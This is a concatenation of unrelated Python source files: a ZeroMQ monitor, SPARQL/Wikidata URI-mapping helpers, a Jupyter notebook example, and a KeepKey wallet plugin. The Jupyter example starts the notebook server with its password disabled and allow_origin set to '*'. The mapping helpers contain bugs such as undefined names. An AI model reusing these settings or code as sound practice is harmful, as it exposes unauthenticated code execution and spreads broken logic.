self.io_loop.spawn_callback(self._internal_send_recv)
self.send_queue.append(message)
return future
class ZeroMQSocketMonitor(object):
__EVENT_MAP = None
def __init__(self, socket):
'''
Create ZMQ monitor sockets
More information:
http://api.zeromq.org/4-0:zmq-socket-monitor
'''
self._socket = socket
self._monitor_socket = self._socket.get_monitor_socket()
self._monitor_stream = None
def start_io_loop(self, io_loop):
log.trace("Event monitor start!")
self._monitor_stream = zmq.eventloop.zmqstream.ZMQStream(self._monitor_socket, io_loop=io_loop)
self._monitor_stream.on_recv(self.monitor_callback)
def start_poll(self):
log.trace("Event monitor start!")
try:
while self._monitor_socket is not None and self._monitor_socket.poll():
msg = self._monitor_socket.recv_multipart()
self.monitor_callback(msg)
except (AttributeError, zmq.error.ContextTerminated):
# We cannot log here because we'll get an interrupted system call in trying
# to flush the logging buffer as we terminate
pass
@property
def event_map(self):
if ZeroMQSocketMonitor.__EVENT_MAP is None:
event_map = {}
for name in dir(zmq):
if name.startswith('EVENT_'):
value = getattr(zmq, name)
event_map[value] = name
ZeroMQSocketMonitor.__EVENT_MAP = event_map
return ZeroMQSocketMonitor.__EVENT_MAP
def monitor_callback(self, msg):
evt = zmq.utils.monitor.parse_monitor_message(msg)
evt['description'] = self.event_map[evt['event']]
log.debug("ZeroMQ event: %s", evt)
if evt['event'] == zmq.EVENT_MONITOR_STOPPED:
self.stop()
def stop(self):
if self._socket is None:
return
self._socket.disable_monitor()
self._socket = None
self._monitor_socket = None
if self._monitor_stream is not None:
self._monitor_stream.close()
self._monitor_stream = None
log.trace("Event monitor done!")
|
request.py
|
import json
import re
import urllib.error
import urllib.parse
import urllib.request
from queue import Queue
from threading import Thread
import numpy as np
ex_query = '''
select *{
STR_TO_SUB
}
'''
q_db_wd_sameAs = '''
select ?db_uri ?wd_uri
where{
values ?db_uri { <STR_TO_SUB> }
?db_uri owl:sameAs ?wd_uri.
filter(contains(str(?wd_uri), "http://www.wikidata.org"))
}
'''
q_wd_db_sameAs = '''
select ?db_uri ?wd_uri
where{
values ?wd_uri { <STR_TO_SUB> }
?db_uri owl:sameAs ?wd_uri.
}
'''
dbfr_db_sameAS = '''
select ?db_fr_uri ?db_en_uri
where{
values ?db_fr_uri { <STR_TO_SUB> }
?db_fr_uri owl:sameAs ?db_en_uri.
filter(contains(str(?db_en_uri), "http://dbpedia.org"))
}
'''
dbfr_wiki_isPrimaryTopic = '''
select ?db_fr_uri ?wiki_uri
where{
values ?db_fr_uri { <STR_TO_SUB> }
?db_fr_uri foaf:isPrimaryTopicOf ?wiki_uri.
}
'''
dbfr_wiki_isDisambiguation = '''
select ?db_fr_uri ?db_fr_uri_disambiguation
where{
values ?db_fr_uri { <STR_TO_SUB> }
?db_fr_uri dbpedia-owl:wikiPageRedirects ?db_fr_uri_disambiguation.
}
'''
dben_wiki_isDisambiguation = '''
select ?db_en_uri ?db_en_uri_disambiguation
where{
values ?db_en_uri { <STR_TO_SUB> }
?db_en_uri dbo:wikiPageRedirects ?db_en_uri_disambiguation.
}
'''
qd_query = '''
select distinct *
where{
values ?s { <STR_TO_SUB> }
?s ?p ?o
<FILTER>
}
'''
url_wikidpedia_to_wikidataid = "/w/api.php?action=query&prop=pageprops&format=json&titles=<TITLE>"
def wikiSearchProperty(p, limit=1000000, columns=["?s", "?o"]):
edgelist_pd = pd.DataFrame(data=[], columns=columns)
offset = -1
while True:
offset += limit
df = wikiQuery(p=p, LIMIT=limit, OFFSET=offset)
if len(df) > 0:
edgelist_pd = edgelist_pd.append(df, ignore_index=True)
else:
break
return edgelist_pd
import pandas as pd
def wikiQuery(s, p, filter_q='', q=qd_query):
if s[0] == 'Q':
s = 'http://www.wikidata.org/entity/' + s
q = q.replace('STR_TO_SUB', s).replace('?p', p).replace('<FILTER>', filter_q)
URL = getRequestURL(q, endpointURL='https://query.wikidata.org/sparql')
try:
text = getRequestResult_and_Read(URL)
except:
print(URL)
text = getRequestResult_and_Read(URL)
df = fromXMLtoDataFrame(text)
return df
def fromDbpediaToWikidataUri(db_uris, query=q_db_wd_sameAs):
db_uris = list(db_uris)
queries = getQueries(db_uris, query, offset=20)
URLs = [getRequestURL(q, endpointURL='http://dbpedia.org/sparql') for q in queries]
results = getQueriesResults(URLs)
mapping_db_en_wd = pd.concat([pd.read_csv(r) for r in results]).reset_index(drop=True)
return mapping_db_en_wd
def fromWikidataToDbpediaUri(wd_uris, query=q_wd_db_sameAs):
wd_uris = list(wd_uris)
queries = getQueries(wd_uris, query, offset=20)
URLs = [getRequestURL(q, endpointURL='http://dbpedia.org/sparql') for q in queries]
results = getQueriesResults(URLs)
mapping_db_en_wd = pd.concat([pd.read_csv(r) for r in results]).reset_index(drop=True)
return mapping_db_en_wd
def fromFrenchDbpediatoEnglishDbpedia(db_uris, query=dbfr_db_sameAS):
db_uris = list(db_uris)
queries = getQueries(db_uris, query, offset=20)
URLs = [getRequestURL(q) for q in queries]
results = getQueriesResults(URLs)
mapping_db_fr_en = pd.concat([pd.read_csv(r) for r in results]).reset_index(drop=True)
return mapping_db_fr_en
def fromFrenchDbpediatoWikipedia(db_uris, query=dbfr_wiki_isPrimaryTopic):
db_uris = list(db_uris)
queries = getQueries(db_uris, query, offset=20)
URLs = [getRequestURL(q) for q in queries]
results = getQueriesResults(URLs)
mapping_db_fr_wiki = pd.concat([pd.read_csv(r) for r in results]).reset_index(drop=True)
return mapping_db_fr_wiki
def workerRequestWiki(q1, q2, url_wikidpedia_to_wikidataid=url_wikidpedia_to_wikidataid):
while not q1.empty():
w = q1.get()
base, title = w.split("/wiki/")
URL = base + url_wikidpedia_to_wikidataid.replace('<TITLE>', urllib.parse.quote(title))
res = getRequestResult(URL)
wd_uri = ''
content = res.read()
if type(content) != str:
content = content.decode('utf8')
try:
obj = json.loads(content)['query']['pages']
except:
print(content)
raise Exception
for k in obj:
try:
int(k)
wd_uri = obj[k]['pageprops']['wikibase_item']
except:
pass
if wd_uri != '':
record = {
'wiki_uri': w,
'wd_uri': wd_uri
}
q2.put(record)
q1.task_done()
def getQueriesResultsWiki(items, num_threads=4):
q1 = Queue(maxsize=0)
q2 = Queue()
for item in items:
q1.put(item)
for i in range(num_threads):
worker = Thread(target=workerRequestWiki, args=(q1, q2))
worker.setDaemon(True)
worker.start()
q1.join()
return list(q2.queue)
def fromWikipediatoWikidata(wp_uris, url_wikidpedia_to_wikidataid=url_wikidpedia_to_wikidataid):
records = getQueriesResultsWiki(wp_uris)
return pd.DataFrame(records)
def getDisambiguationListTuple(db_uris, endpointURL='http://fr.dbpedia.org/sparql', query=dbfr_wiki_isDisambiguation):
db_uris = list(db_uris)
queries = getQueries(db_uris, query, offset=20)
URLs = [getRequestURL(q, endpointURL) for q in queries]
results = getQueriesResults(URLs)
mapping_disambiguation = pd.concat([pd.read_csv(r) for r in results]).reset_index(drop=True)
return mapping_disambiguation
def getWikiMissingInfo(wikipage, endpointURL='http://dbpedia.org/sparql'):
title = wikipage.split('/')[-1]
wikistring = wikipage.replace("http:/", "https:/").replace(title, urllib.parse.quote(title))
base_query = 'define sql:describe-mode "CBD" DESCRIBE <STR_TO_SUB>'
query = base_query.replace("STR_TO_SUB", wikistring)
escapedQuery = urllib.parse.quote(query)
requestURL = endpointURL + "?query=" + escapedQuery + "&output=text/csv"
try:
request = urllib.request.Request(requestURL)
result = urllib.request.urlopen(request)
return result
except:
raise Exception
def setWikidataUrisfromDbpedia_fr(annotations_pd):
db_fr_uris = set(annotations_pd['uri'])
mapping_disambiguation = getDisambiguationListTuple(db_fr_uris).to_dict(orient='records')
for m in mapping_disambiguation:
annotations_pd.loc[annotations_pd['uri'] == m['db_fr_uri'], 'uri'] = m['db_fr_uri_disambiguation']
db_fr_uris = set(annotations_pd['uri'])
mapping_db_fr_wiki = fromFrenchDbpediatoWikipedia(db_fr_uris)
matched_wiki = set(mapping_db_fr_wiki["db_fr_uri"])
wiki_uris = set(mapping_db_fr_wiki["wiki_uri"])
mapping_wiki_wd = fromWikipediatoWikidata(wiki_uris)
matched_wd = set(mapping_wiki_wd["wiki_uri"])
for uri in wiki_uris - matched_wd:
df = pd.read_csv(getWikiMissingInfo(uri))
if len(df) > 0:
lines_df = df[df['predicate'] == 'http://schema.org/about'][['subject', 'object']]
lines_df.columns = list(mapping_wiki_wd.columns)
mapping_wiki_wd = mapping_wiki_wd.append(lines_df, ignore_index=True)
mapping_db_fr_wd = (
pd.merge(
mapping_db_fr_wiki,
mapping_wiki_wd,
on='wiki_uri',
how='inner')
[['db_fr_uri', 'wd_uri']]
)
def getWikidataAssociatedUri(uri):
try:
return list(mapping_db_fr_wd[mapping_db_fr_wd['db_fr_uri'] == uri]['wd_uri'])[0].split('/')[-1]
except:
return np.NAN
annotations_pd['uri'] = annotations_pd['uri'].apply(
lambda uri: getWikidataAssociatedUri(uri)
)
return annotations_pd[~annotations_pd['uri'].isnull()]
def setWikidataUrisfromDbpedia_en(annotations_pd, name_col='uri'):
db_en_uris = set(annotations_pd[name_col])
mapping_disambiguation = getDisambiguationListTuple(db_en_uris,
endpointURL='http://dbpedia.org/sparql',
query=dben_wiki_isDisambiguation
).to_dict(orient='records')
for m in mapping_disambiguation:
annotations_pd.loc[annotations_pd[name_col] == m['db_en_uri'], name_col] = m['db_en_uri_disambiguation']
db_en_uris = set(annotations_pd[name_col])
mapping_db_en_wd = fromDbpediaToWikidataUri(db_en_uris)
def getWikidataAssociatedUri(uri):
try:
return list(mapping_db_en_wd[mapping_db_en_wd['db_uri'] == uri]['wd_uri'])[0].split('/')[-1]
except:
return np.NAN
annotations_pd['uri'] = annotations_pd[name_col].apply(
lambda uri: getWikidataAssociatedUri(uri)
)
return annotations_pd[~annotations_pd['uri'].isnull()]
def setWikidataUris_Babelfy(annotations_pd):
db_en_uris = set(annotations_pd['uri'])
mapping_disambiguation = getDisambiguationListTuple(db_en_uris,
endpointURL='http://dbpedia.org/sparql',
query=dben_wiki_isDisambiguation
).to_dict(orient='records')
for m in mapping_disambiguation:
annotations_pd.loc[annotations_pd['uri'] == m['db_fr_uri'], 'uri'] = m['db_fr_uri_disambiguation']
db_en_uris = set(annotations_pd['uri'])
mapping_db_en_wd = fromDbpediaToWikidataUri(db_en_uris)
matched_wd = set(mapping_wiki_wd["db_uri"])
recall_wd = (len(matched_wd) / len(db_en_uris))
print("Recall_wd:", recall_wd * 100, '%')
def getWikidataAssociatedUri(r):
try:
wd_uri = list(mapping_db_en_wd[mapping_db_en_wd['db_uri'] == r]['wd_uri'])[0]
identifier = wd_uri.split('/')[-1]
return identifier
except:
return ''
annotations_pd['wd_uri'] = annotations_pd['uri'].apply(
lambda r: getWikidataAssociatedUri(r)
)
return annotations_pd
def getRequestURL(query, endpointURL='http://fr.dbpedia.org/sparql', q=False):
escapedQuery = urllib.parse.quote(query)
requestURL = endpointURL + "?query=" + escapedQuery + "&output=text/csv&timeout=10000000"
if q:
return requestURL, query
else:
return requestURL
def getRequestResult(requestURL):
request = urllib.request.Request(requestURL)
result = urllib.request.urlopen(request)
return result
def getRequestResult_and_Read(requestURL):
result = getRequestResult(requestURL)
text = result.read().decode("utf-8")
return text
def workerRequest(q1, q2):
while not q1.empty():
URL = q1.get()
res = getRequestResult(URL)
q2.put(res)
q1.task_done()
def fromXMLtoDataFrame(sstr):
obj_list = list()
rex_column_names = re.compile(r"<variable name='(.*?)'")
column_names = re.findall(rex_column_names, sstr)
rex = re.compile(r'<result.*?>(.*?)</result>', re.S | re.M)
results = re.findall(rex, sstr)
flag = False
for j, res in enumerate(results):
obj = {}
if flag:
print(j)
flag = False
for c in column_names:
rex = re.compile(r"<binding name='" + c + "'>\n\t\t\t\t<.*?>(.*?)</.*?>\n\t\t\t</binding>", re.S | re.M)
obj[c] = re.findall(rex, res)[0]
try:
obj_list.append(obj)
except:
print(results)
print("No item")
print(rex_3)
raise Exception
flag = True
if len(obj_list) > 0:
return pd.DataFrame(obj_list)
else:
return pd.DataFrame(data=[], columns=column_names)
def getQueriesResults(URLs, num_threads=4):
q1 = Queue(maxsize=0)
q2 = Queue()
for url in URLs:
q1.put(url)
for i in range(num_threads):
worker = Thread(target=workerRequest, args=(q1, q2))
worker.setDaemon(True)
worker.start()
q1.join()
return list(q2.queue)
def getQueries(strs, query, offset=10, replaceHTTP=False, flag_string=False, flag_print=False):
queries = []
linked_strings = []
for i in range(0, len(strs), offset):
if flag_print and i % 10000 == 0:
print(i)
if replaceHTTP:
qr = ex_query.replace("STR_TO_SUB",
"\nUNION\n".join(
['{' + query.replace("STR_TO_SUB", s.replace("http:/", "https:/")) + '}'
for s in strs[i:i + offset]
if type(s) != float]))
else:
qr = ex_query.replace("STR_TO_SUB",
"\nUNION\n".join(
['{' + query.replace("STR_TO_SUB", s) + '}' for s in strs[i:i + offset]
if type(s) != float]))
queries.append(qr)
linked_strings.append([s for s in strs[i:i + offset]])
if flag_string:
return queries, linked_strings
return queries
|
main.py
|
"""
An example demonstrating a stand-alone "notebook".
Copyright (c) Jupyter Development Team.
Distributed under the terms of the Modified BSD License.
Example
-------
To run the example, see the instructions in the README to build it. Then
run ``python main.py`` and navigate your browser to ``localhost:8765``.
Note
----
This file provides the Python code for interacting with the Jupyter notebook
server using ``ZMQ`` and the ``tornado`` web server.
"""
import re
import subprocess
import sys
import threading
import tornado.web
# Install the pyzmq ioloop. Must be done after importing tornado.web and
# before importing any additional tornado modules
from zmq.eventloop import ioloop
ioloop.install()
PORT = 8765
"""int: Port number of web application"""
class MainPageHandler(tornado.web.RequestHandler):
"""Handle requests between the main app page and notebook server."""
def initialize(self, base_url):
"""Intitialize the base URL of the handler."""
self.base_url = base_url
def get(self):
"""Get the main page for the application's interface."""
return self.render("index.html", static=self.static_url,
base_url=self.base_url)
def main(argv):
"""Start the 'notebook' example.
- Start the Tornado main event loop for the Jupyter notebook server
- Set up the main page event handler for the 'notebook' example
"""
nb_command = [sys.executable, '-m', 'notebook', '--no-browser',
'--debug',
# FIXME: allow-origin=* only required for notebook < 4.3
'--NotebookApp.allow_origin="*"',
# disable user password:
'--NotebookApp.password=',
]
nb_server = subprocess.Popen(nb_command, stderr=subprocess.STDOUT,
stdout=subprocess.PIPE)
# Wait for Jupyter notebook server to complete start up
while 1:
line = nb_server.stdout.readline().decode('utf-8').strip()
if not line:
continue
print(line)
if 'Jupyter Notebook is running at:' in line:
base_url = re.search(r'(http[^\?]+)', line).groups()[0]
break
while 1:
line = nb_server.stdout.readline().decode('utf-8').strip()
if not line:
continue
print(line)
if 'Control-C' in line:
break
def print_thread():
while 1:
line = nb_server.stdout.readline().decode('utf-8').strip()
if not line:
continue
print(line)
thread = threading.Thread(target=print_thread)
thread.setDaemon(True)
thread.start()
handlers = [
(r"/", MainPageHandler, {'base_url': base_url}),
(r'/(.*)', tornado.web.StaticFileHandler, {'path': '.'}),
]
app = tornado.web.Application(handlers, static_path='build',
template_path='.',
compiled_template_cache=False)
app.listen(PORT, 'localhost')
# For Windows, add no-op to wake every 5 seconds (5000 ms) to handle
# signals that may be ignored by the Tornado main event loop
if sys.platform.startswith('win'):
pc = ioloop.PeriodicCallback(lambda: None, 5000)
pc.start()
loop = ioloop.IOLoop.current()
print('Browse to http://localhost:%s' % PORT)
try:
# Start the Tornado main event loop
loop.start()
except KeyboardInterrupt:
print(" Shutting down on SIGINT")
finally:
nb_server.kill()
loop.close()
if __name__ == '__main__':
main(sys.argv)
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum_axe.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum_axe.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum_axe.bip32 import BIP32Node
from electrum_axe import constants
from electrum_axe.axe_tx import to_varbytes, serialize_extra_payload
from electrum_axe.i18n import _
from electrum_axe.transaction import deserialize, Transaction
from electrum_axe.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_axe.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None:
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', )
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
import keepkeylib.transport_webusb
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = (keepkeylib.transport_hid.DEVICE_IDS +
keepkeylib.transport_webusb.DEVICE_IDS)
self.device_manager().register_devices(self.DEVICE_IDS)
self.libraries_available = True
except ImportError:
self.libraries_available = False
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
def webusb_transport(self, device):
from keepkeylib.transport_webusb import WebUsbTransport
for d in WebUsbTransport.enumerate():
if device.id_.startswith(d.getSerialNumber()):
return WebUsbTransport(d)
return WebUsbTransport(device)
def _try_hid(self, device):
self.logger.info("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.logger.info(f"cannot connect at {device.path} {e}")
return None
def _try_webusb(self, device):
self.logger.info("Trying to connect over WebUSB...")
try:
return self.webusb_transport(device)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
def create_client(self, device, handler):
if device.product_key[1] == 2:
transport = self._try_webusb(device)
else:
transport = self._try_hid(device)
if not transport:
self.logger.info("cannot connect to device")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Axe Testnet" if constants.net.TESTNET else "Axe"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2pkh', ):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2pkh', ):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.get_keepkey_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.get_keepkey_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_keepkey_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
if t.version > 2:
tx_type = d['tx_type']
if tx_type:
t.extra_data = to_varbytes(serialize_extra_payload(tx))
t.version |= tx_type << 16
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
main.py
|
# -*- coding: utf-8 -*-
"""
Onyx Project
https://onyxlabs.fr
Software under licence Creative Commons 3.0 France
http://creativecommons.org/licenses/by-nc-sa/3.0/fr/
You may not use this software for commercial purposes.
@author :: Cassim Khouani
"""
import onyx, sys, os, time
import threading
from threading import Thread
from onyx.utils.log import getLogger
from onyx.sockyx.client.ws import WebsocketClient
from onyx.sockyx.message import Message
global ws
LOG = getLogger('Client')
def handle_speak(event):
utterance = event.data.get('utterance')
